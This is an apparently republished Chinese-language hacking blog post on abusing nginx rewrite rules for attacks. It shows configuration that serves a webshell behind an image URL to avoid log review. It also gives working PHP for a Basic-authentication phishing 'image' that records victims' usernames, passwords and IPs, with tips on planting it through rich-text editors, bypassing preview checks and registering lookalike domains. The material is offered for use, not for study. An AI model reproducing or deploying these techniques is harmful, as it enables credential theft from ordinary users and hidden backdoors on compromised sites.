Hack with rewrite

时间 2019-11-13

标签 hack rewrite 繁體版

原文原文链接

0x00 简介

你们都知道apache，nginx等有rewrite的功能，经过rewrite规则能够把输入的URL转换成另外一个URL，这是咱们常见的一种需求，可让咱们的url变得更加简洁。可是其实这个功能也可被用于一些别的目的。下面就简单的介绍一下。php

0x01 后门

关于经过配置文件作后门已经有不少文章有了介绍，即.htaccess和.user.ini文件构造后门，关于.htaccess后门能够看这里,user.ini后门P牛也发过一篇文章，能够看这里,固然还有柠檬师傅的php.ini构成的后门。那么跟rewrite有什么关系呢。其实rewrite主要是为了逃避日志审查，经过rewrite，咱们能够经过访问一个图片后缀的文件来执行咱们的webshell，可是修改这些配置文件须要必定的权限。下面来进行一下简单的介绍。测试的时候主要是使用nginx,因此对nginx进行一下介绍，关于apache的配置有兴趣能够本身去查一波。下面是个人配置：
ngingx.confcss

worker_processes 1;
events {
 worker_connections 1024;
}
http {
 include mime.types;
 default_type application/octet-stream;
 sendfile on;
 keepalive_timeout 65;
 include /usr/local/nginx/vhosts/*.conf;
 server {
 listen 80;
 server_name localhost;
 location / {
 root html;
 index index.html index.htm;
 }
 error_page 500 502 503 504 /50x.html;
 location = /50x.html {
 root html;
 }
 }
}

配置了多个域名的配置，因此针对某个域名的配置文件在vhosts里面，要配置的域名的配置文件：mydomain.confhtml

server {
 listen 80;
 server_name mydomain.com;
 root /www/mydomain;
 index index.html index.php;
 if ( $query_string ~* ".*[\;'\<\>].*" ){
 return 404;
 }
 location ~ .*\.(gif|jpg|jpeg|bmp|png|swf|flv|ico)$ {
 expires 30d;
 }

 location ~ .*\.(js|css)?$ {
 expires 7d;
 }
 location ~ \.php$ {
 fastcgi_pass 127.0.0.1:9000;
 fastcgi_index index.php;

 include fastcgi_params;
 #设置PATH_INFO并改写SCRIPT_FILENAME,SCRIPT_NAME服务器环境变量
 set $fastcgi_script_name2 $fastcgi_script_name;
 if ($fastcgi_script_name ~ "^(.+\.php)(/.+)$") {
 set $fastcgi_script_name2 $1;
 set $path_info $2;
 }
 fastcgi_param PATH_INFO $path_info;
 fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name2;
 fastcgi_param SCRIPT_NAME $fastcgi_script_name2;
 }
}

要配置重定向很简单，只须要加入nginx

1
2
3

location ~ \.png$ {
rewrite ^/img/test\.png$ /img/test.php last;
}

意思是匹配以png结尾的url，若是匹配到 img/test.png，则重定向到 img/test.php，因此，只须要在img目录下存放test.php，咱们就能够经过访问 http://domain.com/img/test.png来访问。以下图:git

关于更多匹配的规则，能够看这篇文章。github

配置完须要重启nginx服务。web

0x02 基础认证钓鱼

关于基础认证钓鱼，其实很早以前就已经有文章介绍过了，好比如何制做基础认证钓鱼页面。其实原理就是在页面中插入一个php的img，即:shell

1	<img src="http://site.com/1.php"alt="Could not load image - Invalid credentils."/>>

php的代码就是401的验证，当用户打开这个页面的时候，因为请求了http://site.com/1.php，因此会弹出验证的页面，用户输入帐号密码以后，密码则会被攻击者记录。apache

注：这种方法适用于Firefox和IE浏览器，Chrome并不会弹出基础认证窗口。浏览器

为了让此攻击达到更好地隐蔽效果，咱们可使用rewrite来重写url。则使得访问的连接文件后缀为一个图片。为了达到更好地攻击效果，写了如下php代码：


$now = new DateTime();
$user = isset($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : "";
$pass = isset($_SERVER['PHP_AUTH_PW']) ? $_SERVER['PHP_AUTH_PW'] : "";
if ($user && $pass){
 $fp = fopen("count.txt", "a");
 $content = fread($fp);
 $ip = $_SERVER["REMOTE_ADDR"];
 $all = file_get_contents("count.txt");
 fwrite($fp, $now->format("Y-m-d H:i:s") . "\t" . $ip . "\t" . $user . ":" . $pass . "\n");
 $line = substr_count($all,$ip);
 fclose($fp);
}
if($line < 2){
 header('WWW-Authenticate: Basic realm="Corporate domain"');
}else{
 header('content-type: image/png');
 echo file_get_contents("test.png");
}
?>

代码的功能就是弹出认证窗口，等待用户输入，并将输入的帐号密码存到count.txt，若是此用户输入已达3次（一次输入多是随便输入的帐号密码），则输出正常图片。演示以下：

固然，你能够本身定义其余功能，好比将帐号密码发送到邮箱等等。

php代码写好了，怎么利用呢？
其实咱们要作到就是找各类编辑器，找那种能够远程插入图片的，而后插入咱们的连接，若是网站直接把连接插入网站，那么在加载的时候，就会加载咱们的验证页面。rewrite除了可让后缀看起来是一个图片文件，其实还能够对一些编辑器进行绕过，好比插入远程图片的时候，编辑器对图片进行预览:

碰到这种状况，咱们能够首先使用默认配置的nginx插入图片，以下图：

插入成功并提交之后，再从新修改rewrite。这样能够进行一些绕过。某种情景的攻击以下：
demo:

为了达到更好地效果。攻击者能够注册一个看起来受信任的域名。好比说，若是攻击者的目标是targetdomain.com，那么他就能够注册以下的相似地址：

targetdomain.co
targetdomain.net
target-domain.com
targetdomain-oauth.com
targetdomain-cdn.com
targetdomain-images.com
login-targetdomain.com